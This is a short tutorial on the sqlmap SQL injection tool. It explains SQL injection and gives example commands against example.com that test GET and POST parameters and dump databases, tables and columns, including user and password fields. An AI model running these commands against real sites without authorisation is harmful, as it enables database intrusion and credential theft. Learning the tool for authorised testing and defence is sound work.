Sqlmap is an open source software used to automate SQL injection search within web applications. With Sqlmap it is possible to find the vulnerability, exploit it and connect to the database to view, modify or delete the tables.
SQL injection is a hacking technique that aims to inject code by exploiting vulnerabilities in a web application that uses SQL-type databases. The vulnerability is due to the lack of controls on the input data received. SQL commands are then injected through queries into the database of a web application in order to authenticate with maximum privileges in protected areas of the site even without having access credentials and to view and alter sensitive data.
Among the types of sql injection techniques supported by sqlmap we find:
- boolean-based blind;
- time-based blind;
- error-based;
- union query-based;
- stacked queries;
- out-of-band.
The tests it can perform can take advantage of the GET, POST, HTTP values Cookie, User-Agent and HTTP Referer parameters.
GET requests
An example of sqlmap command using a GET request is the following:
sqlmap -u "http://example.com/?id=1" -p id
Where “id” is the parameter to be tested.
-u: URL to scan.
POST requests
A POST request may be the following:
sqlmap -u "http://example.com/login.php" --data "user=admin&pass=pass" --method POST
Where the parameters to be tested are “user” and “pass”.
dump option
dump option is useful for dump database data such as database name, tables names and columns data:
sqlmap -u "http://example.com/?id=1" -p id --dump -T users
to dump “users” table (-T option).
-D stands for Database name;
-T stands for Table;
-C stands for Column.
sqlmap -u "http://example.com/?id=1" -p id --dump
to dump all possible.
When we get database name we can run sqlmap to let show us the Tables contained in database:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name --dump
The result should show us the Tables names, then we can gain the columns names within one of the Table found:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name --dump
Finally, to see the contents of a column within a table:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name -C example_column_name --dump
If we want to see the content of two or more Columns we can run the following:
sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name -C column1,column2,user,password --dump